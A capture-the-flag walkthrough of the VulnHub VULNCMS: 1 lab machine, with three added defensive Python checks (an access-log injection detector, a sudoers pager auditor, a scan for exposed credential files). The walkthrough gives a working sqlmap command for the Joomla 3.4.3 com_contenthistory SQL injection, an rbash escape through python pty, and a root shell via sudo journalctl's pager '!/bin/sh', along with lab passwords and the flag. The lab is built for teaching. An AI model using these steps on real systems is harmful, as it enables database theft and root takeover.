Vulnhub: VULNCMS: 1
VulnCMS
This is VULNCMS: 1 from VulnHub. We’ve got some new machines, so let’s go.
Ports
We’ve got SSH on 22 and a website on 80, and then WordPress on 5000, Joomla on 8081 and Drupal on 9001. Where shall we start?
WordPress?
nmap says:
_http-generator: WordPress 5.7.2
That’s a recent version; if there was a vulnerability in WP core I’d probably have heard about it. Of course it could be a plugin, but let’s pass for now.
Drupal
┌──(root💀kali)-[/opt/vulnhub/vulncms]
└─# droopescan scan drupal -u http://192.168.1.241:9001
[+] Plugins found:
profile http://192.168.1.241:9001/modules/profile/
php http://192.168.1.241:9001/modules/php/
image http://192.168.1.241:9001/modules/image/
[+] Themes found:
seven http://192.168.1.241:9001/themes/seven/
garland http://192.168.1.241:9001/themes/garland/
[+] Possible version(s):
7.54
[+] Possible interesting urls found:
Default changelog file - http://192.168.1.241:9001/CHANGELOG.txt
[+] Scan finished (0:00:07.905186 elapsed)
A quick search doesn’t find anything obvious for version 7.54; let’s move on.
Joomla
┌──(root💀kali)-[/opt/vulnhub/vulncms]
└─# joomscan --url http://192.168.1.241:8081
This turns up:
[+] Detecting Joomla Version
[++] Joomla 3.4.3
That version is vulnerable to SQL injection. There are some scripts for it, but I run sqlmap with this command:
sqlmap -u "http://192.168.1.241:8081//index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=*" --technique=E --dbs --dump
The moon rises and falls. Seasons change. Little babies grow into adults. Eventually, the entire database is dumped. OK, yes, this was my fault for not optimising the query, but it’s my time I wasted.
We get some password hashes (which I can’t crack), and this:
47,elliot,
,1,5T3e!_M0un7i@N, , AND OTHER STUFF
That row came from the users table, and the password in it lets us SSH in as elliot.
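The injection request above is also what the attack looks like from the Joomla server’s side. As an added example (not part of this write-up, and not sqlmap or Joomla code), here is a small detector that parses combined-format access-log lines, decodes the query string and flags any com_contenthistory request whose list[select] or list[ordering] value is not a bare column name, plus the default sqlmap user agent. The log lines are constructed; the field names and the column-name rule are assumptions to tune for your own site.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" log format. Field names are assumptions for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# A legitimate list[select] / list[ordering] value is a bare column name such as "a.id".
SAFE_FIELD = re.compile(r'^[A-Za-z_][A-Za-z0-9_.]*$')

# Constructed sample log lines (not from the target). Line 1 reproduces the
# injection URL from the write-up, line 2 is ordinary traffic, line 3 is a
# URL-encoded repeat that the server answered with a 500.
SAMPLE_LOG = """\
192.0.2.10 - - [17/Jun/2021:11:40:01 +0000] "GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=* HTTP/1.1" 200 5123 "-" "sqlmap/1.5"
192.0.2.11 - - [17/Jun/2021:11:40:02 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8842 "-" "Mozilla/5.0"
192.0.2.10 - - [17/Jun/2021:11:40:03 +0000] "GET /index.php?option=com_contenthistory&view=history&list%5Bselect%5D=%2A HTTP/1.1" 500 233 "-" "sqlmap/1.5"
"""


def analyse_request(line):
    """Return a finding dict for a suspicious request line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m['target']).query
    params = dict(parse_qsl(query, keep_blank_values=True))   # decodes %5B -> [
    reasons = []
    if params.get('option') == 'com_contenthistory':
        for key in ('list[select]', 'list[ordering]'):
            value = params.get(key)
            if value and not SAFE_FIELD.match(value):
                reasons.append(f'{key}={value!r} is not a bare column name')
    if 'sqlmap' in m['ua'].lower():
        reasons.append('sqlmap user agent')
    if not reasons:
        return None
    return {'ip': m['ip'], 'ts': m['ts'], 'status': m['status'], 'reasons': reasons}


def scan_log(text):
    """Run analyse_request over every line and collect the findings in order."""
    return [f for f in (analyse_request(l) for l in text.splitlines()) if f]


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit['ts'], hit['ip'], hit['status'], '; '.join(hit['reasons']))
```

The user-agent check is only a bonus (sqlmap can randomise it); the parameter check is the one that survives, because the component needs a column name there and an injection never looks like one.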
Elliot
Elliot has rbash; don’t be like Elliot:
Last login: Thu Jun 17 11:49:58 2021 from 192.168.1.210
elliot@vuln_cms:~$ cd /
-rbash: cd: restricted
elliot@vuln_cms:~$ python3 -c 'import pty;pty.spawn("/bin/bash");'
elliot@vuln_cms:~$ cd /dev/shm
elliot@vuln_cms:/dev/shm$
Elliot can’t run sudo. I run linpeas but get nothing very useful. I find this:
elliot@vuln_cms:/$ cd opt
elliot@vuln_cms:/opt$ ls -lash
total 12K
4.0K drwxr-xr-x 2 root root 4.0K May 31 07:59 .
4.0K drwxr-xr-x 24 root root 4.0K Jun 17 11:20 ..
4.0K -rw-r--r-- 1 root root 69 May 31 07:58 8081.cred
elliot@vuln_cms:/opt$ cat 8081.cred
Username: joomlaCMS_admin
Password: _q4gWWJuBWt8cqfbUm-cdevR?L@N7-pR
Not useful. Then I find this:
elliot@vuln_cms:/var/www/html/home/vulnerable$ ls -lash
total 2.0M
4.0K drwxr-xr-x 2 tyrell tyrell 4.0K May 31 07:45 .
4.0K drwxr-xr-x 3 tyrell tyrell 4.0K May 30 09:34 ..
1.3M -rw-r--r-- 1 tyrell tyrell 1.3M May 26 06:54 image1.png
16K -rw-r--r-- 1 tyrell tyrell 15K May 26 06:55 image2.jpg
156K -rw-r--r-- 1 tyrell tyrell 153K May 26 06:55 image3.jpg
96K -rw-r--r-- 1 tyrell tyrell 94K May 31 07:44 image4.jpg
352K -rw-r--r-- 1 tyrell tyrell 352K May 26 07:07 image5.jpg
24K -rw-r--r-- 1 tyrell tyrell 22K May 26 07:08 image6.gif
elliot@vuln_cms:
Notice that the date on image4 is different from the others?
┌──(root💀kali)-[/opt/vulnhub/vulncms]
└─# stegseek image4.jpg
StegSeek version 0.5
Progress: 0.00% (0 bytes)
[i] --> Found passphrase: "123456789"
[i] Original filename: "wp_pass.txt"
[i] Extracting to "image4.jpg.out"
┌──(root💀kali)-[/opt/vulnhub/vulncms]
└─# cat image4.jpg.out
Random URLs are helpful but 5000 times
Not useful.
Then I find this:
elliot@vuln_cms:/var/www/html/drupal/misc$ ls -lash
total 504K
4.0K drwxr-xr-x 4 tyrell tyrell 4.0K May 31 10:47 .
4.0K drwxr-xr-x 9 tyrell tyrell 4.0K May 31 09:17 ..
# snip
4.0K -rwxr-xr-x 1 tyrell tyrell 129 Feb 1 2017 tree-bottom.png
4.0K -rwxr-xr-x 1 tyrell tyrell 130 Feb 1 2017 tree.png
4.0K -rw-r--r-- 1 root root 45 May 31 10:47 tyrell.pass
4.0K drwxr-xr-x 3 tyrell tyrell 4.0K Feb 1 2017 ui
# snip
elliot@vuln_cms:/var/www/html/drupal/misc$ cat tyrell.pass
Username: tyrell
Password: mR_R0bo7_i5_R3@!_
elliot@vuln_cms:/var/www/html/drupal/misc$ su tyrell
Password:
tyrell@vuln_cms:/var/www/html/drupal/misc$ sudo -l
Matching Defaults entries for tyrell on vuln_cms:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tyrell may run the following commands on vuln_cms:
(root) NOPASSWD: /bin/journalctl
tyrell@vuln_cms:
Definitely useful.
tyrell@vuln_cms:/var/www/html/drupal/misc$ sudo -u root /bin/journalctl
-- Logs begin at Fri 2021-05-28 12:16:41 UTC, end at Fri 2021-06-18 10:55:53 UTC
May 28 12:16:41 vuln_cms kernel: Linux version 4.15.0-143-generic (buildd@lcy01-
May 28 12:16:41 vuln_cms kernel: Command line: BOOT_IMAGE=/vmlinuz-4.15.0-143-ge
# snip
May 28 12:16:41 vuln_cms kernel: NX (Execute Disable) protection: active
!/bin/sh
# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
vuln_cms
Fri Jun 18 10:56:11 UTC 2021
# cd /root
# ls
root.txt
# cat root.txt
4359537020406305
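The escape works because journalctl pages its output through less when stdout is a terminal, and the pager’s ! command runs a shell as whoever the pager runs as, here root. The real defect is the sudoers rule: sudo lets a command listed without arguments be run with any arguments, so (root) NOPASSWD: /bin/journalctl is a rule for an interactive root shell, whereas (root) NOPASSWD: /bin/journalctl --no-pager would permit only that exact invocation (and the Defaults env_reset shown above already stops the caller re-enabling a pager through the environment). As an added example, not from the write-up, here is a small auditor for sudo -l output that flags pager-backed commands granted without a pager-disabling argument. The sample output is constructed around the rule above; the extra rules in it, and the list of pager-backed commands, are assumptions to extend.

```python
import os
import re

# Commands that hand their output to an interactive pager when run on a terminal.
# The pager's '!' command runs a shell, so a sudo rule for one of these without
# pinned arguments is effectively a rule for an interactive shell as the runas user.
PAGER_BACKED = {'journalctl', 'systemctl', 'less', 'more', 'man'}
NO_PAGER_FLAG = {'journalctl': '--no-pager', 'systemctl': '--no-pager'}

# One rule line of `sudo -l` output: "(runas) [TAG: ...] /path/cmd [args]".
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$')

# Constructed sample `sudo -l` output: the write-up's rule plus three hypothetical
# rules for contrast (one pinned journalctl, one pager itself, one harmless command).
SAMPLE_SUDO_L = """\
Matching Defaults entries for tyrell on vuln_cms:
    env_reset, mail_badpass

User tyrell may run the following commands on vuln_cms:
    (root) NOPASSWD: /bin/journalctl
    (root) NOPASSWD: /bin/journalctl --no-pager -u nginx
    (root) /usr/bin/less /var/log/syslog
    (ALL) NOPASSWD: /usr/bin/apt update
"""


def parse_rules(sudo_l_output):
    """Extract the command rules that follow the 'may run the following commands' line."""
    rules, in_rules = [], False
    for line in sudo_l_output.splitlines():
        if 'may run the following commands' in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            rules.append({'runas': m['runas'], 'tags': m['tags'].split(),
                          'cmd': m['cmd'], 'args': m['args'].split()})
    return rules


def audit_rules(rules):
    """Flag rules whose command opens a pager, unless the arguments are pinned
    to a form that turns the pager off."""
    findings = []
    for rule in rules:
        name = os.path.basename(rule['cmd'])
        if name not in PAGER_BACKED:
            continue
        if NO_PAGER_FLAG.get(name) in rule['args']:
            continue      # e.g. "journalctl --no-pager ...": pager off and arguments fixed
        findings.append({
            'cmd': rule['cmd'], 'args': rule['args'], 'runas': rule['runas'],
            'nopasswd': 'NOPASSWD:' in rule['tags'],
            'why': f'{name} pages its output; the pager can spawn a shell as {rule["runas"]}',
        })
    return findings


if __name__ == '__main__':
    for f in audit_rules(parse_rules(SAMPLE_SUDO_L)):
        tag = 'NOPASSWD ' if f['nopasswd'] else ''
        print(f"{tag}{f['cmd']} {' '.join(f['args'])}: {f['why']}")
```

Run it against sudo -l output from each host (or feed it the rules from a central sudoers inventory); the fix for each finding is to pin the arguments, or to wrap the command in a script that calls it with --no-pager and grant that script instead.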
And done.
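Both footholds on this box came from credential files left readable by everyone: /opt/8081.cred and tyrell.pass were mode 644, so any account on the machine could read them. As an added example, not part of the write-up, here is the corresponding check for a defender: walk a tree and report regular files that are readable by group or others and contain a line that looks like a handed-out password. The demo tree and its placeholder secrets are constructed inside a temporary directory (hypothetical paths modelled on the ones above); the keyword list is an assumption to extend.

```python
import os
import re
import stat
import tempfile

# A line that hands out a secret in cleartext, e.g. "Password: ..." or "secret=...".
CRED_LINE = re.compile(r'^\s*(password|passwd|pass|secret|token)\s*[:=]\s*\S+', re.IGNORECASE)
MAX_BYTES = 64 * 1024                   # only inspect small, text-like files
EXPOSED = stat.S_IRGRP | stat.S_IROTH   # readable by the group or by everyone


def exposed_credential_files(root):
    """Walk root and return (path, mode, uid) for regular files that are readable
    by someone other than their owner and contain a credential-looking line."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)            # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or st.st_size > MAX_BYTES:
                continue
            if not st.st_mode & EXPOSED:
                continue                       # owner-only; not exposed
            try:
                with open(path, 'r', errors='replace') as fh:
                    if any(CRED_LINE.match(line) for line in fh):
                        hits.append((path, stat.S_IMODE(st.st_mode), st.st_uid))
            except OSError:
                continue
    return sorted(hits)


def build_demo_tree():
    """Constructed sample tree with placeholder secrets: one world-readable credential
    file (like /opt/8081.cred above), one owner-only credential file and one harmless
    world-readable file. Returns the temporary root directory."""
    root = tempfile.mkdtemp(prefix='cred-audit-')

    def put(rel, text, mode):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'w') as fh:
            fh.write(text)
        os.chmod(path, mode)

    put('opt/8081.cred', 'Username: joomlaCMS_admin\nPassword: PLACEHOLDER-NOT-REAL\n', 0o644)
    put('home/svc/.app.secret', 'password=PLACEHOLDER-OWNER-ONLY\n', 0o600)
    put('var/www/html/README', 'Static assets live here.\n', 0o644)
    return root


if __name__ == '__main__':
    demo = build_demo_tree()
    for path, mode, uid in exposed_credential_files(demo):
        print(f'{oct(mode)} uid={uid} {os.path.relpath(path, demo)}')
```

Run it as root over /opt, /home and the web roots after each deployment; anything it reports should be moved into a secrets store or at least chmod 600 and owned by the one service that needs it.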